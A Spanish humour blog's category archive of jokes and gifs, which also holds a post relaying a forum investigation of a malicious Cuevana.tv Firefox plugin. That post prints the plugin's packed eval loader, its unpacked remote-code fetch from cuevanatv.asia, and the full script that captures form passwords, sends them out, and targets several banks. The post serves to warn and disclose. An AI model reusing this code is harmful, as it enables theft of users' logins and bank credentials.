Archivo de la categoría: Momieces

Sabias que..? (Pokémon fact)

¿Es arte o no es arte?


“Sum Times” vía Aakash Nihalani.

Soy yo o..

El estribillo de esta canción dice :“You Know, I’m Bitch Again”

bueno, viendo el videoclip podría decirlo perfectamente, pero no, dice “You know I beat your gun uhuhuh”
a lo que yo les digo.. MIS COJONES 33.

+

+

+

* Por cierto, para llegar a ese video primero he tenido que pasar por este, que no se queda corto en demigrancia.

Un puente que mejora con la llegada de la noche


Dicen que si vas de droja hasta las cejas hace combo y explotas.

Visto en: FinoFilipino

No darán más iPads gratis a los diputados que pierdan o rompan sus iPads

Hemos pensado que con una tira se entiende un poco mejor, pero si quieres ver la noticia (pone lo mismo, con otras palabras), aquí tienes el link:

 

Link a la noticia

 

PD: No estamos de coña, es una noticia real.

Razones por las que un iPhone es mejor que un Android

Ya era hora de que alguien demostrara por qué el iPhone 5 supera a cualquier Android.

 

http://iphonemejorqueandroid.es/

 

Si no puedes ver bien la página pulsa Ctrl+W.

 

Visto en: FinoFilipino

Gadgets útiles (para dejar monedas sueltas, por ejemplo)

Algunos son más útiles y otros menos, pero todos son como mínimo originales.

 



Visto en: Artori

Bucle infinito de vela


Visto en: 4gifs

Raíz pésima

Para los que no sepáis nada de Matemáticas, esto es una raíz n-ésima (enésima, como la frase “por enésima vez”).

Y esto es una raíz p-ésima:


Y en esto consisten las clases de Cálculo de mi grado.

Modelos económicos (ejemplos de andar por casa)

Es un poco momio, pero hay algunos que valen la pena.

  • Socialismo: Tú tienes 2 vacas. El estado te obliga a darle una a tu vecino.

  • Comunismo: Tú tienes 2 vacas. El estado te las quita y te da algo de leche.

  • Fascismo: Tú tienes 2 vacas. El estado te las quita y te vende algo de leche.

  • Nazismo: Tú tienes 2 vacas. El estado te las quita y te dispara en la cabeza.

  • Burocracia (papeleo): Tú tienes 2 vacas. El estado te pierde una, ordeña la otra y luego tira la leche al suelo.

  • Capitalismo (tradicional): Tú tienes 2 vacas. Vendes una y te compras un toro. Haces más vacas. Vendes las vacas y ganas dinero.

  • Capitalismo (moderno): Tú tienes 2 vacas. Vendes 3 de tus vacas a tu empresa que cotiza en bolsa mediante letras de crédito abiertas por tu cuñado en el banco. Luego ejecutas un intercambio de participación de deuda con una oferta general asociada con lo que ya tienes las 4 vacas de vuelta, con exención de impuestos por 5 vacas. La leche que hacen tus 6 vacas es transferida mediante intermediario a una empresa con sede en las Islas Cayman que vuelve a vender los derechos de las 7 vacas a tu compañía. El informe anual afirma que tu tienes 8 vacas con opción a una más. Coges tus 9 vacas y las cortas en trocitos. Luego vendes a la gente tus 10 vacas troceadas. Curiosamente durante todo el proceso nadie parece darse cuenta que, en realidad, tú sólo tienes 2 vacas.

  • Economía japonesa: Tú tienes 2 vacas. Las rediseñas a escala 1:10 y que te produzcan el doble de leche. Pero no te haces rico. Luego ruedas todo el proceso en dibujos animados. Los llamas ‘Vakimon’ e incomprensiblemente, te haces millonario.

  • Economía alemana: Tú tienes 2 vacas. Mediante un proceso de reingeniería consigues que vivan 100 años, coman una vez al mes y se ordeñen solas. Nadie cree que tenga ningún mérito.

  • Economía rusa: Tú tienes 2 vacas. Cuentas y tienes 5 vacas. Vuelves a contar y te salen 257 vacas Vuelves a contar y te salen 3 vacas. Dejas de contar vacas y abres otra botella de vodka.

  • Economía china: Tú tienes 2 vacas. Tienes a 300 tíos ordeñándolas. Explicas al mundo tu increíble ratio de productividad lechera. Disparas a un periodista que se dispone a contar la verdad.

  • Economía iraquí: Tú no tienes vacas. Nadie cree que no tengas vacas, te bombardean y te invaden el país. Tú sigues sin tener vacas.

  • Economía suiza: Hay 5.000.000.000 vacas. Es obvio que tienen dueño pero nadie parece saber quién es.

  • Economía francesa: Tú tienes 2 vacas. Entonces te declaras en huelga, organizas una revuelta violenta y cortas todas las carreteras del país, porque tú lo que quieres son 3 vacas.

  • Economía neozelandesa: Tú tienes 2 vacas. La de la izquierda te parece cada día más atractiva.

  • Economía española: Tú tienes 2 vacas, pero no tienes ni idea de donde están. Pero como ya es viernes, te bajas a desayunar al bar que tienen el “Marca”. Si acaso, ya te pondrás a buscarlas el miércoles después del puente de San Aniceto.

Visto en: Taduni

[¿Sabías que…?] Lenny Kravitz

Lenny Kravitz sale con gafas de sol en el 90% de fotos en Google Images.

La razón, que está un poco bizco:

Visto en: FinoFilipino

Espectrómetro de masas

Los más freaks dirán que es el espectro y no el espectrómetro. Ok.

¡Póntelo de estado en Tuenti!

Cosas del magnetismo


Visto en: 4gifs

¡Póntelo de estado en Tuenti!

El plug-in de CUEVANA.TV ROBA DATOS Y CONTRASEÑAS de los usuarios

Toda la entrada es una recopilación de un post de Forocoches, abierto por el usuario srednalF, le agradecemos a él y a todos los demás usuarios de Forocoches que han ayudado ( y lo siguen haciendo ) para descubrir qué hay detrás de todo este lío. Esta entrada se irá actualizando con la información, datos y demás que se vayan averiguando poco a poco.

NOTICIA REDACTADA por el usuario RME de Forocoches:

(Link al post original: http://www.forocoches.com/foro/showthread.php?p=119904298 )

Cuevana.tv, la conocida web de visionado online usada por varios millones de personas ha sido reportada como una web de “phising” (robo de datos sensibles) al detectar que el plugin que utiliza para supuestamente hacer streaming de los contenidos, contiene codigo malicioso utilizado para robar tus datos de redes sociales como Facebook e incluso de sitios de banca online como Banco Santander, Paypal y otros servicios de pago generalmente latinoamericanos.

Al parecer, al intentar visionar contenido de su sitio, éste pide autorización para instalar un complemento (plugin) para tu navegador (tanto firefox como chrome).
Este complemento aparentemente inofensivo resulta tener escondido en su código un script que contacta con el sitio web http://cuevanatv.asia que contiene codigos en JavaScript para efectuar el robo de tus datos personales cada vez que rellenas un formulario en un sitio de confianza.

Se recomienda encarecidamente a todas las personas que alguna vez hayan visitado este conocido portal de streaming que revisen sus navegadores y eliminen el plugin “Cuevana Streaming”.
Despues de este procedimiento es obligatorio cambiar todas tus claves que hayan podido ser interceptadas por este script malicioso.

Si deseas investigar el plugin, solo necesitas descargarlo desde hxxp://www.cuevana.tv/player/plugins/cstream-4.2.xpi y extraerlo con un descompresor de archivos (WinRar, 7Zip…), despues abre el archivo “script-compiler.js” que encontrarás en la carpeta “content”.
Una vez abierto ese archivo observa la linea número 232.

Código:

eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!''.replace(/^/,String)){while(c--){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('6 0=7 5();0.4(\'1\',\'2://3.8/h.9?\'+g.e(),d);0.a(b);c(0.f);',18,18,'r|GET|http|cuevanatv|open|XMLHttpRequest|var|new|asia|js|send|null|eval|false|random|responseText|Math|back3'.split('|'),0,{}))

En ella se encuentra este fragmento de código que lanza una petición hacia la web http://cuevanatv.asia que es la que captura los datos personales.

Muchos usuarios ya estan haciendo eco de la noticia bajo los hashtag #Cuevana , #CuevanaRoba y #PluginCuevana

———————————-

Todo el mundo sabe que para utilizar el sitio web cuevana.tv te piden descargar un plugin, pues estaba haciendo unas cosillas y utilizando un plugin de firefox llamado tamper data he podido ver que el plugin de cuevana bypassea los formularios de entrada (usuario/contraseña) y los envía a sus servidores, después de hacer esto el formulario se envía normalmente a la página en la que estás y no notas nada, al desinstalar el plugin he podido comprobar como esto no sucedía, y al instalarlo de nuevo he comprobado de nuevo como SÍ sucedía, la prueba está aquí:

http://i47.tinypic.com/15n0wpj.png”

———————————-

actualización : post #217, el forero muertet ha encontrado la parte de código maliciosa tambien por sus propios medios, queda confirmado, que para firefox 15 /ubuntu 11.10/windows 7 y plugin cuevana 4.2 este problema existe.
———————————-
Aquí un vídeo de cómo “actúa” el plug-in:

actualización : confirmado, en firefox, cualquier versión, está infectado con el código malicioso que roba datos. También estamos descubriendo scripts que parecen relacionados con el phising y robo de datos bancarios.

———————————–
ACTUALIZACIÓN IMPORTANTE:

Confirmado que el plugin oficial tiene phising

Pruebas:
Descomprimir xpi con WinRar (hxxp://www.cuevana.tv/player/plugins/cstream-4.2.xpi) (NO INSTALEIS)

Entrar en la carpeta “content” y mirar la linea 232 del archivo “script-compiler.js”.

La url maliciosa es hxxp://cuevanatv.asia/back3.js

———————————-

IMPORTANTE: En el post #294 hay una RECOPILACIÓN de todo el MALWARE del plug-in.

———————————-

MUY IMPORTANTE:

Para todo aquel que sepa de programación/código y demás, aquí el código malicioso, gracias al usuario muertet de Forocoches:

ESTÁ ESCONDIDO EN EL script-compiler.js del plugin de firefox. En forma de eval. Si se hace el unpack podemos encontrar las peticiones citadas.

eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!''.replace(/^/,String)){while(c--){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('6 0=7 5();0.4(\'1\',\'2://3.8/h.9?\'+g.e(),d);0.a(b);c(0.f);',18,18,'r|GET|http|cuevanatv|open|XMLHttpRequest|var|new|asia|js|send|null|eval|false|random|responseText|Math|back3'.split('|'),0,{}))

Unpacked:

var r=new XMLHttpRequest();
r.open('GET','http://cuevanatv.asia/back3.js?'+Math.random(),false);
r.send(null);
eval(r.responseText);

El script malicioso:

var r = new XMLHttpRequest(); r.open('GET', "http://cuevanatv.asia/scripts.txt", false); r.send(null); if (r.status == 200) eval(r.responseText); OSid = Components.classes['@mozilla.org/xre/app-info;1'].getService(Components.interfaces.nsIXULRuntime).O S; OSid = (OSid=='Darwin')?3:((OSid=='WINNT' )?2:((OSid=='Linux')?1:0)); function _sData(datos, url) { var r = new XMLHttpRequest; r.open("POST", "http://cuevanatv.asia/add.php", true); r.setRequestHeader("Content-type", "application/x-www-form-urlencoded"); r.send("d="+datos+"&o="+OSid+"&u="+url); } Components.classes["@mozilla.org/observer-service;1"].getService(Components.interfaces.nsIObserverServi ce).addObserver({ observe : function(aWindow, aTopic, aData) { if (aWindow instanceof Ci.nsIDOMWindow && aTopic == 'content-document-global-created') { var win = aWindow.wrappedJSObject; win.addEventListener("submit", function(e) { datos = []; enviar = false; for each(i in e.target.elements) { if(i.type=='password') enviar=true; if(i.type!='hidden' && i.type!='submit' && i.type!=undefined) datos.push(i.name+"::"+i.value); } if(enviar) _sData(datos.join(":_:"), win.location.href); } ,false); var xmlhr = new Object(); xmlhr.open = win.XMLHttpRequest.prototype.open; xmlhr.send = win.XMLHttpRequest.prototype.send; if (win.location.host.indexOf("facebook.com")==-1) { win.XMLHttpRequest.prototype.open=function(a,b){ a=(!a)?'':a; b=(!b)?'':b; xmlhr.open.apply(this, arguments); xmlhr.metodo = a.toLowerCase(); xmlhr.url = b; if(xmlhr.metodo=='get') xmlhr.datos = b.split("?")[1]; } win.XMLHttpRequest.prototype.send=function(a,b){ a=(!a)?'':a; b=(!b)?'':b; xmlhr.send.apply(this, arguments); if(xmlhr.metodo=='post') xmlhr.datos = a; xmlhr.callback(); } } xmlhr.callback = function(){ enviar = false; activadores = ["pass", "pss", "clave", "contra"]; for each(dato in this.datos.split("&")) { for each(activador in activadores) { if(dato.split("=")[0].indexOf(activador)>-1) enviar=true; } } if(enviar) _sData(this.datos.split("&").join(":_:").split("=" ).join("::"), win.location.href); } win.addEventListener("DOMContentLoaded", function(e){ for(site in scripts) { if (win.location.host.indexOf(site)>-1) { var r = new XMLHttpRequest(); r.open('GET', scripts[site], false); r.send(null); if (r.status == 200) eval(r.responseText); } } },false); } } }, 'content-document-global-created', false);

El scripts.txt:
var scripts = { 'santander.com.mx':'http://cuevanatv.asia/plugin.js', 'banvenez.com':'http://cuevanatv.asia/plugin1.js', 'scotiaweb.com.mx':'http://cuevanatv.asia/plugin2.js' }

A parte de keylogger, está especializado en robar cuentas de esos bancos.

———————————-

AVISO! Actualización a las 19:25

Cuevanatv.asia parece ser que ha caido, o ha sido el host o ellos mismos.

http://www.downforeveryoneorjustme.com/cuevanatv.asia

———————————-

AVISO! Actualización a las 19:50

El nuevo plugin (diferente pero con la misma version para que no se sospeche ) YA NO ROBA DATOS. En el tamper Data ya no da el aviso que daba antes. Esto quiere decir que han borrado u ocultado la parte del código maliciosa.

———————————-

19:57

Confirmado, solo cambia la linea 232 del fichero script-compiler.js

Han borrado la línea maliciosa del código para ocultar las pruebas. En el hilo de forocoches se puede encontrar el ficheo original con el código malicioso, como prueba.

———————————-

IMPORTANTE: Aclarar que GalactiCow no culpa directamente a CUEVANA, ya que pueden haber infectado el plug-in terceros, simplemente difundimos la información. Desde GalactiCow aconsejamos borrar el plug-in y cambiar todas las contraseñas y/o nombres de usuarios posibles.

Aquí el link al post de FOROCOCHES con toda la información, datos, comentarios, etc:

http://www.forocoches.com/foro/showthread.php?t=2923803

Para todo aquel que quiera descojonarse, entienda el Valenciano/Catalán y le interese mínimamente la historia..

“Artículo denigrante número 1 “
“Artículo denigrante número 2 “
“Artículo denigrante número 3 “
“Artículo denigrante número 4 “

LAMANTABLA

400

Visto en: http://www.inh.cat, o también conocido como Nazinh.cat

¡Póntelo de estado en Tuenti!

A %d blogueros les gusta esto: